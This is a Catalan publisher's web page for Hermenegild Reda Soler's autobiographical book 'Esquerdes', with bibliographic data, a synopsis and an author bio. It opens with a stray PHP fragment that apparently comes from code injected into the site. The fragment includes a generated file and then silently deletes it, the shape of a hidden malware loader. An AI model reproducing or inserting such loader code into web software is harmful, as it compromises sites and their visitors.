");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Esquerdes
Cercador d'Obres
ORDENAR:
Començar recerca

Esquerdes

Reda Soler, «Metildo», Hermenegild

Prologuista:
Sacarès, Josep
Col·lecció:
Magatzem Can Toni
Tema:
Biografia
Pàgines:
158
PVP:
12.00
ISBN:
84-95694-87-5
Data d'Edició:
26/09/2003
Sinopsi
«Esquerdes significa moltes coses, i entre d’altres, tros de pedra, estellicó..., per això crec que cal entendre aquesta obra com trossos, retalls, capítols de la vida de l’autor. És una obra de les anomenades del gènere autobiogràfic.»(del Pròleg de J. Sacarès.) «Hauré sembrat més de cent arbres, pintats uns quants quadres i he escrit un llibre, sí, sí, un llibre, res de miques, les miques per als polls. [...] Era una cosa que havia de fer, ho duia dins la mollera, i com que, si és possible, no ens hem d’anar endarrer de res, aquí queda aquest testimoni.»
Hermenegild Reda Soler, «Metildo»
(Llucmajor, 1936), Metildo, ha fet de tallador de pell i de foraviler ocasional; les seves aficions per la caça, la pesca i els esclata-sangs l'han dut a trescar i conèixer pam a pam el territori llucmajorer, sobretot la zona de marina i la costa. Amb aquest volum, Hermenegild Reda arro­doneix i completa el camí que va emprendre l'any 2003 amb Esquerdes, publicat en aquesta mateixa col·lecció.

Recomanar
Comentar
Comentaris (0)